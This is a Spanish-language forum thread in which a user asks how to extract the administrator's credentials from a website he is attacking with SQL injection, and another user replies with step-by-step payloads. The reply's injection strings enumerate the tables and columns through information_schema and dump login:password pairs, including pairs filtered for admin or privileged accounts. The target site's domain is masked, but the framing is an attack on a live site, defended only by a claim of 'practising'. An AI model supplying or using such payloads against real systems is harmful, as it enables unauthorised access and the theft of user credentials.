Título: Ayuda, no logro encontrar el nombre de administrador. Publicado por: Kaosk. en 18 Agosto 2010, 23:05 pm Muy buenas tardes, estoy haciendo pruebas de SQLi y esta ha sido la primera que me ha salido bien, hasta el momento ;-).
Pues el problema es que no encuentro ninguna tabla llamada "users,usuarios" o algo y ahí me quedoo entrabancado dejo la inyección: (http://www.xxxx.xxx/info_page.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1,1--) A partir de ahí que tengo que hacer para poder encontrar el usuario/administrador, un saludo y muchas gracias. Título: Re: Ayuda, no logro encontrar el nombre de administrador. Publicado por: cgvwzq en 18 Agosto 2010, 23:40 pm Sacas todas las tablas, y buscas la de los usuarios:
Código: union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+ A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios: Código: union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+ Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo: Código: union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+ Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco (http://"http://ponymagic.diosdelared.com/index.php?coment=3956"). Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario. Código: union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+ Código: union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+ No seas malo... Título: Re: Ayuda, no logro encontrar el nombre de administrador. Publicado por: Kaosk. en 19 Agosto 2010, 09:54 am Muchas gracias :D
Tranquilo que no haré nada solo estoy practicando hehe. |